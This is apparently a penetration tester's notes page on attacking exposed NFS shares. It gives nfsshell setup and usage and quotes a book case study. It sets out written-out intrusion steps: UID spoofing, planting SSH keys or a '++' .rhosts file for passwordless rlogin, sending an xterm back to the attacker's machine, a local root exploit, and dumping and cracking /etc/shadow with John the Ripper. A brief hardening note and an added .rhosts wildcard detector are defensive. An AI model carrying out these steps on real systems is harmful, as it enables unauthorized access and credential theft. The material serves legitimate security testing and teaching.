Attack to NFS
Download and install nfsshell
Source: http://www.perspectiverisk.com/blog/2013/03/nfsshell-installation/
NFSShell is a neat little tool that allows user-level access to an NFS server and its NFS shares. It can be used by penetration testers to exploit known issues with the NFS service, typically associated with port 2049/tcp. A whole host of vulnerabilities are associated with an NFS share being exposed.
The screenshot below shows several simple steps I took to view an NFS share available to mount on the 192.168.0.16 host. I then used the NFSShell tool to export and mount the shares to view the files hosted on the exposed share.
If you have ever Googled for instructions on how to install NFSShell on Ubuntu you might have noticed there aren’t a lot of references on how to do this easily. I found a small number of references online that provide installation instructions but they didn’t work well for me, although I was able to use them as a starting point. With a bit of tweaking this is what worked for me:
Platforms tested:
- Ubuntu 12.04 32bit
- Backtrack 5 R3 32bit.
Pop open a terminal and input the following commands:
Changing some text in the Makefile
Before you can run the make file and install NFSShell you need to make some changes. In your terminal enter:
Comment the four lines following:
Then, uncomment the 3 lines following:
To complete the process run the newly amended make file by entering the following into your terminal window:
Provided there are no errors, you have successfully compiled NFSShell. To test to see if your tool is working, type the following in your terminal whilst inside the nfs folder:
Exploitation via NFSSHELL
Some important points:
ls -l
tells you the owner ids of the share (folders). If you try to do
cd myshare
(after the export command) and the system denies you, then you can do "uid 1000" where 1000 is the user id of the file listed by ls -l. In this way you can access the share content.
If you want to pwn the machine you should be able to write in the target's home folder. Sometimes you might be required to run nfsshell with root privileges. To perform the attack you need to generate the ssh key and copy the public one to the share using the "upload" functionality provided by nfsshell.
after that you can run
ssh root@target
to log in to the target.
When SSH is not in use you can use rlogin. In this case you need to upload a file called .rhosts which, if you cat it, contains "++":
echo "++" > .rhosts
after that run the command
rlogin -l
Exploitation via mount option in linux
A similar attack in NFS can be done by mounting the share as follows:
sudo mount -o soft,intr,rsize=8192,wsize=8192 :/ /mnt/tmp2/
Other useful links:
mount -t nfs 192.168.1.112:/ /mnt -o nolock
NFS is predominantly insecure in its implementation. System admins are sometimes under pressure to get things done and it's easy to set up an NFS share and offer it out to the default (everyone)! A more secure format would be to assign hostnames/IP addresses or utilise some sort of TCP wrapper for access to the NFS shares, i.e.
Export list for 192.168.0.1:
/export/goodstuff workstn1,workstn2
Any attempt then to try and mount these shares remotely returns:
failed, reason given by server: Permission denied
Additional information
From the book: http://hackbbs.org/article/book/Hack%20IT%20Security%20Through%20Penetration%20Testing.pdf
9.6.4 nfsshell
URL: ftp://ftp.cs.vu.nl/pub/leendert
Description: The nfsshell tool is essentially a client that can access NFS servers over
either TCP or UDP. This tool is helpful in testing and verifying the existence of potential
exposures in NFS servers. The source code is available as freeware and has been tested
on several UNIX variants, including AIX, DEC, SunOS, and Linux (including Red Hat 5).
Usage: nfsshell is a straightforward, easy-to-use command line tool with numerous
options that works much like an FTP client. It allows remote connection to an NFS server in
much the same way an FTP client remotely connects to an FTP server. The following command allows you to access the client:
nfs
At this point, the prompt should change to the following:
nfs>
From here, the help command brings up a list of available commands, many of which will
be familiar, including the cd, uid, get, and put commands that allow a user to change the
directory, change the user ID, get a file from the remote host, and put a file onto the remote
host, respectively. The complete list, taken from the help documentation, follows.
host <host> - set remote host name
uid [<uid> [<secret-key>]] - set remote user ID
gid [<gid>] - set remote group ID
cd [<path>] - change remote working directory
lcd [<path>] - change local working directory
cat <filespec> - display remote file
ls [-l] <filespec> - list remote directory
get <filespec> - get remote files
df - file system information
rm <file> - delete remote file
ln <file1> <file2> - link file
mv <file1> <file2> - move file
mkdir <dir> - make remote directory
rmdir <dir> - remove remote directory
chmod <mode> <file> - change mode
chown <uid>[.<gid>] <file> - change owner
put <local-file> [<remote-file>] - put file
mount [-upTU] [-P port] <path> - mount file system
umount - umount remote file system
umountall - umount all remote file systems
export - show all exported file systems
dump - show all remote mounted file systems
status - general status report
help - this help message
quit - it's all in the name
bye - good-bye
handle [<handle>] - get/set directory file handle
mknod <name> [b/c major minor] [p] - make device
More interesting commands include the host command, which initiates a
connection to the specified target (using either its host name or IP address). The export
command then lists the target's export list. These files or directories can be mounted with
the mount command.
--
Case Study: UNIX Penetration
During an internal penetration test we found some interesting services running on a UNIX
system at IP address 10.10.10.10. Our Nmap port scan (using the command shown below)
revealed that NFS (port 2049) and rlogin (port 513) were running on the target system.
Nmap's operating system detection also revealed that the operating system was Red Hat
6.1. We determined that we might be able to exploit NFS and rlogin to gain access to the
system.
# nmap -sT -O 10.10.10.1-254
First we needed to determine what information was available from NFS. We issued the
command:
# showmount -e 10.10.10.10
This command returned the information that users' home directories were exported. Using
the mount command we mounted a user's home directory, which we will call user1.
Since rlogin was also running on the server, we could attempt to establish a trust
relationship so that we could log in to the system with no password. A .rhosts file in a
user's home directory specifies what systems are trusted and allows users from those
hosts to log in with no password. Therefore, if we could create a .rhosts file in the user1
home directory and add an entry to allow it to trust our system, we could log in with no
password.
Unfortunately, the mounted file system was not writable. We attempted to use nfsshell to
get around this problem. Using nfsshell, we attempted to change the UID to “1” on the
mounted file system to give us write access. This is done by simply specifying the UID
value in the nfsshell client:
nfs> uid 1
Using the status command we verified that the UID was changed.
Now that we had write access to the file system, we could create a .rhosts file. Adding a
"++" to the .rhosts file causes the target to trust any user on every system. We issued the
following command to create the .rhosts file in the user1 home directory.
# echo ++ >.rhosts
Now we could log in to the system as user1:
# rlogin -l user1 10.10.10.10
Now we were logged in as user1. We wanted to elevate our privileges to root. To help us
achieve this, we sent an Xterm back to our system. On our system we issued the following
command:
# xhost +10.10.10.10
On the target system, we executed the following command to export the display. The IP
address of our laptop was 10.10.10.100.
xterm -display 10.10.10.100:0.0
Now we had a fully functional Xterm and could execute commands as if we were sitting at
the console. Next, we started to research local buffer overflow attacks that we could use to
elevate our access. Searching Packetstorm we found a local buffer overflow for Red Hat
6.1 that yielded root access. We downloaded an exploit called vixi-crontab. We ran this
exploit and obtained root privileges on the system.
Once we had root we captured the password and shadow password files and cracked
them using John the Ripper.
# unshadow /etc/passwd /etc/shadow > crack.1
# john crack.1
Now we had additional passwords to attempt on other systems.
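The .rhosts wildcard used in the nfsshell section above and again in this case study is also the artifact a defender can look for. As an added example (not from the original page or the book it quotes), the following Python script walks a directory tree such as the exported home directories, parses every .rhosts file as "host [user]" lines, and reports entries whose host field is a "+" wildcard (including the "++" spelling used above) or whose user field is "+". The sample home directories and their contents are constructed in a temporary directory for the example.

```python
"""Find rhosts trust wildcards, the artifact the .rhosts technique above leaves.

Constructed example (not from the original page or the book): walks a
directory tree such as the exported home directories, parses every .rhosts
as 'host [user]' lines, and reports entries whose host field is a '+'
wildcard (including the '++' spelling used above), since those trust every
host, or whose user field is '+'.
"""
import os
import shutil
import tempfile


def wildcard_lines(text):
    """Return the lines of an rhosts-style file that grant wildcard trust."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # A host field made only of '+' characters ('+' or '++') trusts every
        # host; a '+' user field trusts every user from the named host.
        if set(fields[0]) == {"+"} or "+" in fields[1:]:
            hits.append(line)
    return hits


def scan_tree(root):
    """Return sorted [(path, line), ...] for every wildcard entry under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if ".rhosts" not in filenames:
            continue
        path = os.path.join(dirpath, ".rhosts")
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line in wildcard_lines(fh.read()):
                findings.append((path, line))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample: three home directories, two with risky .rhosts."""
    root = tempfile.mkdtemp(prefix="rhosts-demo-")
    samples = {
        "user1": "++\n",                    # the form used in the page
        "user2": "workstn1 user2\n# ok\n",  # specific host and user: fine
        "user3": "+ +\nworkstn2\n",         # any host, any user
    }
    for user, content in samples.items():
        home = os.path.join(root, user)
        os.makedirs(home)
        with open(os.path.join(home, ".rhosts"), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def remove_demo_tree(root):
    """Delete the constructed sample tree."""
    shutil.rmtree(root)


if __name__ == "__main__":
    demo = build_demo_tree()
    try:
        for path, line in scan_tree(demo):
            print(f"{path}: wildcard trust entry {line!r}")
    finally:
        remove_demo_tree(demo)
```

Run it against the mount point of an exported home tree (or against /etc/hosts.equiv with wildcard_lines) as a periodic check; an rlogin trust entry that appears on a home directory which is exported read-write is exactly the chain this case study describes.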